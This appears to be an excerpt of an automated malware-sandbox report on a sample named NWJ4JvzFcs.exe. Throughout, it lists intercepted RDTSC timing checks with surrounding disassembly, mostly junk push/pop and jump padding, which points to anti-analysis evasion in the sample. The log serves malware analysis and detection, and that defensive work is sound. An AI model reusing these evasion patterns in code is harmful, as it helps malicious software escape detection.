Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14DA161 second address: 14DA171 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a je 00007F04A523FCB6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14DA47E second address: 14DA499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F04A523AA90h 0x00000009 jl 00007F04A523AA86h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14DA7A2 second address: 14DA7A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14DE66E second address: 14DE674 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14DE7EB second address: 14DE7EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14DEE8A second address: 14DEE9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F04A523AA8Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14DEFFA second address: 14DEFFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14DF145 second address: 14DF178 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA94h 0x00000007 jmp 00007F04A523AA96h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14DF178 second address: 14DF17E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14EB91D second address: 14EB93F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F04A523AA8Fh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F04A523AA86h 0x00000012 jns 00007F04A523AA86h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14EB93F second address: 14EB943 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14EBD54 second address: 14EBD8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F04A523AAA1h 0x0000000b jmp 00007F04A523AA99h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 jmp 00007F04A523AA8Dh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14EBD8C second address: 14EBDB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F04A523FCC9h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F04A523FCB6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14EBDB2 second address: 14EBDC6 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F04A523AA86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F04A523AA86h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14EC205 second address: 14EC20B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14EC20B second address: 14EC218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F04A523AA8Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14EC35F second address: 14EC364 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14EC364 second address: 14EC394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F04A523AA90h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F04A523AA93h 0x00000011 jc 00007F04A523AA86h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14EC505 second address: 14EC50B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14EC50B second address: 14EC539 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 je 00007F04A523AA86h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 pushad 0x00000012 jmp 00007F04A523AA98h 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14EC689 second address: 14EC6BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F04A523FCB6h 0x0000000a jno 00007F04A523FCB6h 0x00000010 popad 0x00000011 pop edi 0x00000012 pushad 0x00000013 jmp 00007F04A523FCC9h 0x00000018 push ecx 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14EC6BA second address: 14EC6C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14EC7EB second address: 14EC7EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14F5266 second address: 14F5275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14F5275 second address: 14F5286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F04A523FCBDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14F4E2B second address: 14F4E2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14F4E2F second address: 14F4E35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 15026DB second address: 15026F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F04A523AA93h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 15026F4 second address: 1502701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007F04A523FCB8h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1502701 second address: 1502721 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F04A523AA99h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1502721 second address: 1502733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007F04A523FCB6h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 15028C2 second address: 15028D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jc 00007F04A523AA86h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 150F130 second address: 150F152 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F04A523FCC6h 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1510BC3 second address: 1510BC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1510BC7 second address: 1510BCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1510BCD second address: 1510BD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1510BD3 second address: 1510BF8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F04A523FCCEh 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1519826 second address: 151982D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 151982D second address: 151983D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F04A523FCB6h 0x0000000a popad 0x0000000b push ebx 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 15196E2 second address: 15196E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 151CA09 second address: 151CA0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 151CA0D second address: 151CA24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F04A523AA8Dh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 151CA24 second address: 151CA28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 151CA28 second address: 151CA2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 151CA2E second address: 151CA72 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F04A523FCC8h 0x00000008 jne 00007F04A523FCB6h 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 pushad 0x00000013 jmp 00007F04A523FCC0h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b pushad 0x0000001c push edi 0x0000001d pop edi 0x0000001e push eax 0x0000001f pop eax 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 push esi 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 152301B second address: 152301F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 152301F second address: 1523041 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523FCC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push edi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 152317B second address: 152319A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F04A523AA93h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1523600 second address: 1523604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1523604 second address: 152360A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 152360A second address: 1523633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop eax 0x0000000a jbe 00007F04A523FCB8h 0x00000010 popad 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F04A523FCC1h 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1523633 second address: 1523637 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1523637 second address: 152363D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 152379F second address: 15237B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 ja 00007F04A523AA8Ch 0x0000000b jbe 00007F04A523AA86h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 15237B0 second address: 15237B5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 152392A second address: 1523947 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F04A523AA88h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F04A523AA8Fh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1523B0F second address: 1523B19 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F04A523FCB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1523B19 second address: 1523B1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1523B1F second address: 1523B25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1523B25 second address: 1523B2F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F04A523AA86h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1523B2F second address: 1523B49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F04A523FCBAh 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1523B49 second address: 1523B4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1523B4F second address: 1523B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1528085 second address: 15280A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F04A523AA95h 0x00000009 pop edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 15280A2 second address: 15280D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F04A523FCC9h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 pop eax 0x0000001a pop edi 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 15280D5 second address: 15280EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA8Bh 0x00000007 ja 00007F04A523AA86h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1527C8D second address: 1527C96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1527E06 second address: 1527E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1527E0B second address: 1527E18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F04A523FCB6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 152D13B second address: 152D145 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F04A523AA8Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 143F6CA second address: 143F70B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F04A523FCB6h 0x00000008 jnl 00007F04A523FCB6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F04A523FCBEh 0x00000015 popad 0x00000016 jnp 00007F04A523FCDDh 0x0000001c pushad 0x0000001d jmp 00007F04A523FCC9h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 143F70B second address: 143F711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 157F49E second address: 157F4D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F04A523FCBEh 0x0000000a popad 0x0000000b jmp 00007F04A523FCC7h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 157F4D0 second address: 157F4E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F04A523AA8Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 164D0D7 second address: 164D0DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 164BF27 second address: 164BF5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jmp 00007F04A523AA90h 0x0000000a pop edi 0x0000000b push ecx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007F04A523AA90h 0x00000013 pop ecx 0x00000014 pushad 0x00000015 push edx 0x00000016 pop edx 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 164C092 second address: 164C096 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 164C228 second address: 164C22C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 164C22C second address: 164C23C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F04A523FCB6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 164C23C second address: 164C240 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 164C532 second address: 164C536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 164C865 second address: 164C87E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA8Bh 0x00000007 jnl 00007F04A523AA86h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 164C87E second address: 164C882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 164C9A6 second address: 164C9B8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F04A523AA8Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 164C9B8 second address: 164C9BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 164CDAA second address: 164CDCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jnp 00007F04A523AAA0h 0x0000000b jmp 00007F04A523AA94h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 164E7A1 second address: 164E7D0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007F04A523FCC9h 0x0000000e pop edx 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 jno 00007F04A523FCB6h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 164E7D0 second address: 164E7D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 164E7D4 second address: 164E80A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F04A523FCB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F04A523FCC8h 0x00000013 jmp 00007F04A523FCC0h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1652631 second address: 1652637 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1652637 second address: 165263B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1652BB5 second address: 1652BBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
